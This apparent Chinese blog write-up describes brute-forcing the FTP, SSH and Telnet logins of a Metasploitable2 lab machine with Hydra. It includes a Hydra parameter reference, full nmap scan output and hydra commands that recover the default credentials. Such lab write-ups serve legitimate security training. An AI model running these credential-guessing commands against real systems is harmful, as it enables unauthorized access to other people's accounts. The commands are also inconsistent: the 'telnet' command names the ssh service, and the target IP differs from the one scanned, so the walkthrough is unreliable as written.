記一次metasploitable2內網滲透之21,22,23端口爆破

Hydra是一款非常強大的暴力破解工具,它是由著名的黑客組織THC開發的一款開源暴力破解工具。Hydra是一個驗證性質的工具,主要目的是:展示安全研究人員從遠程獲取一個系統認證權限。

目前該工具支持以下協議的爆破:
AFP,Cisco AAA,Cisco身份驗證,Cisco啟用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MySQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚舉,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP。

對于 HTTP,POP3,IMAP和SMTP,支持幾種登錄機制,如普通和MD5摘要等。

Hydra暴力破解工具的用法_byc6352的專欄-CSDN博客

hydra常見參數-R:繼續從上一次進度接著破解-S:大寫,采用SSL鏈接-s  <PORT>:小寫,可通過這個參數指定非默認端口-l  <LOGIN>:指定破解的用戶,對特定用戶破解-L  <FILE>:指定用戶名字典-p  <PASS>:小寫,指定密碼破解,少用,一般是采用密碼字典-P  <FILE>:大寫,指定密碼字典-e  <ns>:可選選項,n:空密碼試探,s:使用指定用戶和密碼試探-C  <FILE>:使用冒號分割格式,例如“登錄名:密碼”來代替 -L/-P 參數-M  <FILE>:指定目標列表文件一行一條-o  <FILE>:指定結果輸出文件-f :在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解-t <TASKS>:同時運行的線程數,默認為16-w <TIME>:設置最大超時的時間,單位秒,默認是30s-v / -V:顯示詳細過程server:目標ipservice:指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等OPT:可選項

nmap掃描metasploitable2靶機,發現有21,22,23號端口,在這篇文章就以這三端口進行詳細實例講解

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:11 CSTNmap scan report for 192.168.43.46Host is up (0.00032s latency).Not shown: 977 closed portsPORT     STATE SERVICE     VERSION21/tcp   open  ftp         vsftpd 2.3.422/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp   open  telnet      Linux telnetd25/tcp   open  smtp        Postfix smtpd53/tcp   open  domain      ISC BIND 9.4.280/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)111/tcp  open  rpcbind     2 (RPC #100000)139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)512/tcp  open  exec        netkit-rsh rexecd513/tcp  open  login       OpenBSD or Solaris rlogind514/tcp  open  tcpwrapped1099/tcp open  java-rmi    GNU Classpath grmiregistry1524/tcp open  bindshell   Metasploitable root shell2049/tcp open  nfs         2-4 (RPC #100003)2121/tcp open  ftp         ProFTPD 1.3.13306/tcp open  mysql       MySQL 5.0.51a-3ubuntu55432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.75900/tcp open  vnc         VNC (protocol 3.3)6000/tcp open  X11         (access denied)6667/tcp open  irc         UnrealIRCd8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

通過下列代碼爆破出ftp登錄名和密碼為msfadmin

hydra -L username.txt -P password.txt 192.168.1.1 ftp

通過下列代碼爆破出ssh登錄名和密碼為msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh  

通過下列代碼爆破出telnet登錄名和密碼為msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh